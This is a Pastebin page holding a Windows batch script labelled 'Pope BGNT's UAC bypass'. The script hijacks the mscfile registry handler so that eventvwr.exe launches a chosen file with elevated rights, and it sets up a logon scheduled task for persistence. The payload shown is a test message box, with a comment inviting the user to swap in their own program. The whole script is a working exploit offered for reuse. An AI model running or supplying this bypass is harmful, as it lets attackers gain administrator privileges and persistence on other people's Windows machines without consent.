Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @ECHO off
- TITLE Pope BGNT's UAC bypass
- DEL %target% /f
- ECHO SchTasks /delete /tn "Rebooty Call" /f >%target%
- ECHO SchTasks /create /tn "Rebooty Call" /tr "C:\Windows\System32\eventvwr.exe" /sc ONLOGON > %target%
- ::Set eventvwr to run the above file.
- REG ADD "HKCU\Software\Classes\mscfile\shell\open\command" /ve /d "%target%" /f
- ::Run eventvwr.exe to create the logon schedualed task.
- START eventvwr.exe
- ::timeout to allow eventvwr to do it's stuff, otherwise have a race condition.
- ::This wont work on Windows XP, replace with a delay using PING
- TIMEOUT 1
- ::Create the payload file, replacing the file created above. THIS IS THE PART YOU SHOULD SWAP FOR YOUR OWN SCRIPT/PROGRAM!
- DEL %target% /f
- ECHO ECHO result=MsgBox("IT WORKS! IT WORKS! YAY!" , 0+48, "UACBypassed") ^> test.vbs >> %target%
- ECHO ECHO WScript.Echo result>> %target%
- ECHO test.vbs>> %target%
- ECHO DEL test.vbs>>%target%
- ECHO ECHO I EXIST AT TIME %%time%% ^> C:\confirmationFile.txt>> %target%
- ::start eventvwr and thus the payload file.
- START eventvwr.exe
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
